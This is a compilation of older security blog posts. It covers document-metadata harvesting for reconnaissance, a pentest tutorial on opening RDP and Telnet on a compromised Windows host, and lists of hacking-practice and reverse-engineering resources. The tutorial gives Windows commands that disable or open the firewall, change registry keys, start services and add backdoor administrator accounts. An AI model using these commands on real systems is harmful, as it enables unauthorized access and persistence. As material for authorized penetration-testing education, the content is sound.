Once it has finished extracting all the metadata you can look at it by clicking on the type or go to Documents select the document and click on it to get even more information not classified in the types given like EXIF data. Here I clicked on the folder tab and you can see I can identify usernames, location, servers and paths on the network of where this documents where created and stored, on some I have tested I was even able to enumerate Sharepoint Server structures.
This information can be exported in to a text file by right-clicking on the attribute and choosing to export data to a file, this can later be used to feed the data in to other tools or to gain information for further attacks like finding types of printers that can be used to store files or exploit since embedded device security tends to be low, or attack shares by dropping office documents with Meterpreter VBA shells or setting autirun.ini files to launch payloads or exploits on client PC's, The options are many.
I will definitely be adding this tool to my toolbox and making it part of my methodology when executing target enumeration during pentetst. I hope you find this information useful and special thanks to the Exotic Liability team for mentioning this tool.
I will be focusing mainly on Windows XP and 2003 and beyond since both the Telnet Service and Remote Desktop Service are already present or can be installed without having to reboot the server. If you are using the latest SVN version of Metasploit you can just run the following Meterpreter Scripts to enable the service on the target machine:
· run getgui –e
· run gettelnet –e
But what if you have shell, what do you do? Let's start with enabling Remote Desktop on the target machine, first things first we want to know what version of windows is running the target machine if we do not know the version of the target we have gotten a shell on, this can be achieved by running:
· ver
This will give you the version of Windows of the target machine and you can deduce the OS from this number:
· 5.0 is Windows 2000
· 5.1 is Windows XP
· 5.2 is Windows 2003
· 6.0 is Windows Vista and Windows 2008
· 6.1 is Windows 7
Know that we know the version of the OS we can check if RDP is already running by just running:
· Netstat –na | find "3389"
If we do not see it running we check if the built in firewall is enabled on our target:
· Netsh firewall show opmode
We must check in specific if operational mode is enabled, if it is the firewall is enabled and if exception mode is enabled that means we can punch holes in the firewall. Depending on the ROE (Rules of Engagement) we can modify the configuration of the firewall, this are some of the commands we may use:
· netsh firewall set opmode mode=DISABLE (Turn off the Firewall)
· netsh firewall set opmode exception=ENABLE (Turn on Exceptions)
· netsh firewall set service type = remotedesktop mode = enable (Enable Remote Desktop port thru the Firewall)
· netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.20 (Limit access to Remote Desktop port to only the IP specified)
Now that we have the firewall configure we can proceeded to enable the RDP service, we must first set a registry key:
· reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" | find "fDenyTSConnections" (if value is 0x0 connections are allowed if 0x1 connection is disabled)
· reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f (Enable RDP Connections)
Once this is set we can proceed by starting the Terminal Services Service, from shell this is achieved with the "SC" command, great care should be taken not to run sc by itself or with the "/?" switch since this will break the shell. The commands to enable the Terminal Services service are:
· sc config termservice start= auto (This will set the service to auto start)
· sc start termservice (This command will start the service)
If we want to create a user from shell and give him RDP access we can run the following commands to achieve this if we have the necessary privileges to create the user:
· net user /add (Adds a user)
· net net localgroup "Remote Desktop Users" /add" (Adds user to Remote Desktop Users so as to be able to connect)
· net localgroup Administrators /add (Adds the user to the local admin group if you have the privileges)
Now we can connect to the target machine if we have access to port 3389.
Getting telnet on a windows host is easier than with RDP, in Windows XP and Windows 2003 it is already installed and disabled, in the case of Windows Vista and Windows 2008 it is not installed by default but the files for installing it are already on the file system. Just like with RDP we can check if the service is installed by running the following command:
· sc query TlntSvr
If the service is running will see that the State will be running, if it is not installed like in the case of Windows Vista and 2008 we will get an error message that the service does not exists. In the case of Windows Vista and 2008 to install the service we just need to run the following commands:
· pkgmgr /iu:"TelnetServer" (Installs Telnet Server)
· pkgmgr /iu:"TelnetClient" (Installs Telnet Client)
Once we have the service installed we can start the service by running the following commands:
· sc config TlntSvr start= auto (This will set the service to auto start)
· sc start TlntSvr (This command will start the service)
To open the port in the Windows Firewall in case it is enabled we just run the following command:
· netsh firewall set portopening protocol = tcp port = 23 mode = enable'
Users that will connect via telnet must be part of the TelnetClients local group, to create an account and add such account to this group the following commands can be ran from shell:
· net user /add (Adds a user)
· net net localgroup TelnetClients /add" (Adds user to TelnetClients Users so as to be able to connect)
· net localgroup Administrators /add (Adds the user to the local admin group if you have the privileges)
Once this is all done if we have access to port 23 we can connect to the target server. One important note Telnet is clear text and great care should be taken from where we are connecting to the target machine since we might introduce risk in to the client environment. Another special note is to document all commands ran on the target machine for clean up after the engagement. The best way I have found to execute this commands is to have them in a text file on my attacking machine modify the command inside a text editor and copy and paste them in to the shell window.
I recently posted a blog post to Exotic Liability's website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your fill of security:
Podcasting:
GetMon – http://www.getmon.com/ – This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.
HackerMedia – http://www.hackermedia.org/ – They put together like podcasts into different categories, and they overlap. So if you want the "Linux" feed, you'll get podcast A, B, and C. But maybe podcast C does Linux security, so if you subscribe to the "Security" feed, you might get C, E, and G. You can also get the everything feed
Bloggers (RSS Feeds):
Security Bloggers Network – http://www.securitybloggers.net/ – A consolidated feed of a HUGE list of security blogs
Twitter:
Security Twits – http://www.security-twits.com/ – A long list of security related twitter accounts. From people to events, to companies.
Places to learn:
The Academy Pro – http://www.theacademypro.com/
Learn Security Online – http://www.learnsecurityonline.com/
Free IT Security Training – http://www.freeitsecuritytraining.com/
Virtual Training Environment by Carnegie Mellon – https://www.vte.cert.org/vteweb/
Challenge Sites and Sites that are OK to attack:
(Make sure you know which is which before you haul off and start attacking though)
(Most of these stolen from Chris Nickerson's reply to Show 17 Links blog post)
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
http://testasp.acunetix.com/Default.asp
http://test.acunetix.com/
http://hackme.ntobjectives.com/
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
http://lampsecurity.org/capture-the-flag-5
http://zero.webappsecurity.com/
http://www.hackertest.net/
http://www.hackthissite.org/
http://www.mavensecurity.com/WebMaven.php
http://ha.ckers.org/challenge/
http://ha.ckers.org/challenge2/
http://demo.testfire.net/
http://scanme.nmap.org/
http://www.hellboundhackers.org/
http://www.overthewire.org/wargames/
http://roothack.org/
http://heorot.net/
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately…
http://wocares.com/xsstester.php
https://how2hack.net
http://hax.tor.hu/
http://www.bright-shadows.net/
http://www.dareyourmind.net/
http://hackergames.net/
http://www.hackquest.com/
http://www.darkmindz.com/
http://www.caesum.com/game/
http://www.net-force.nl/
http://www.osix.net/
http://www.mibs-challenges.de/
http://projecteuler.net/
http://uva.onlinejudge.org/
http://ace.delos.com/usacogate
So now you have absolutely ZERO reason to have one moment of time on your hands
Know of another good resource? Post a comment.
UPDATE: ethicalhack3r from http://www.ethicalhack3r.co.uk pointed me to his project called "Damn Vulnerable Web App". You can find it on Sourceforge here: http://sourceforge.net/projects/dvwa/
Related posts:
Matt, from the Exotic Liability forums, posed a suggestion for a episode: "Getting started [in] reverse engineering hardware drivers?". I thought this was an interesting topic to attack so, I dug a bit into my RSS feed pile of goo and compiled this list of links. Hope this helps Matt.
Skywing – http://www.nynaeve.net/
Egypt – http://0xegypt.blogspot.com/
Yoni – http://blogs.msdn.com/michael_howard/
Raymond Chen – http://blogs.msdn.com/oldnewthing/
Sia0 – http://blogs.msdn.com/michkap/
Rob P – http://geekswithblogs.net/robp/Default.aspx
Quantam – http://qstuff.blogspot.com/
Phn1x – http://hamsterswheel.com/techblog/
Halavar Flake – http://addxorrol.blogspot.com/
Pedram – http://pedram.redhive.com/blog
Tyler Shields – http://www.donkeyonawaffle.org/
Wesley Shields – http://www.atarininja.org/
Peter Wieland – http://blogs.msdn.com/peterwie/
Michael Howard – http://blogs.msdn.com/michael_howard/
Doron Holan – http://blogs.msdn.com/doronh/
Nico Waisman – http://eticanicomana.blogspot.com/
Dmitry Vostokov – http://www.dumpanalysis.org/blog/
Nicolas Sylvain – http://nsylvain.blogspot.com/
Alex Ionescu – http://www.alex-ionescu.com/
Mattheiu Suiche – http://www.msuiche.net/
Larry Osterman – http://blogs.msdn.com/larryosterman/
Koby Kahane – http://kobyk.wordpress.com/
Jason Geffner – http://malwareanalysis.com/communityserver/blogs/geffner/default.aspx
Ero Carrera – http://blog.dkbza.org/
Dino Dai Zovi – http://blog.trailofbits.com/
Ilja – http://blogs.23.nu/ilja/
Nate Lawson – http://rdist.root.org/
Mark Russinovich – http://blogs.technet.com/markrussinovich/
Jose Nazario – http://www.wormblog.com/
Jonathan Morrison – http://blogs.msdn.com/itgoestoeleven/
John Robbins – http://www.wintellect.com/cs/blogs/jrobbins/default.aspx
Ilias Tsigkogiannis – http://blogs.msdn.com/iliast/
Daniel Reynaud – http://indefinitestudies.org/
Joanna Rutkowska – http://theinvisiblethings.blogspot.com/
Matthieu Kaczmarek – http://www.loria.fr/~kaczmare/index.en.htm
Silvio Cesare – http://silviocesare.wordpress.com/
Philippe Beaucamps – http://www.loria.fr/~beaucphi/
Debugging Toolbox – http://blogs.msdn.com/debuggingtoolbox/
Fravia's saved works (RIP) – http://www.woodmann.com/fravia/index.htm
Offensive Computing – http://www.offensivecomputing.net/
The Cover of Night – http://www.thecoverofnight.com/blog/
LHS – http://lhs.loria.fr/
NT Debugging – http://blogs.msdn.com/ntdebugging/
Hex Blog – http://www.hexblog.com/
Engineering for Fun – http://blog.engineeringforfun.com/
OpenRCE – http://www.openrce.org/articles/
DV Labs – http://dvlabs.tippingpoint.com/blog/
Matasano – http://www.matasano.com/log/
VeraCode – http://www.veracode.com/blog/
Trend Micro – http://blog.trendmicro.com/
Reverse Engineering – http://community.reverse-engineering.net/index.php
OpenRCE – http://www.openrce.org/forums/
Assembly Forums – http://www.asmcommunity.net/board/
Joe Box – http://www.joebox.org/
Virus Total – http://www.virustotal.com/
Wepawet – http://wepawet.cs.ucsb.edu/
F-Secure -http://www.f-secure.com/en_US/security/security-lab/
Anubis – http://anubis.iseclab.org/
Jotti – http://virusscan.jotti.org/en
Sunbelt CWSandbox – http://www.sunbeltsecurity.com/Submit.aspx?type=cwsandbox&cs=A41CD150B37359889A553671CBFD2360
Code Breakers Journal – http://www.codebreakers-journal.com/
The Art of Assembly – http://webster.cs.ucr.edu/AoA/DOS/AoADosIndex.html
Intel Processor Instruction Set A-M/N-Z – http://www.intel.com/products/processor/manuals/
WASM.ru with translation – http://66.196.80.202/babelfish/translate_url_content?lp=ru_en&url=http://www.wasm.ru&.intl=us
Related posts: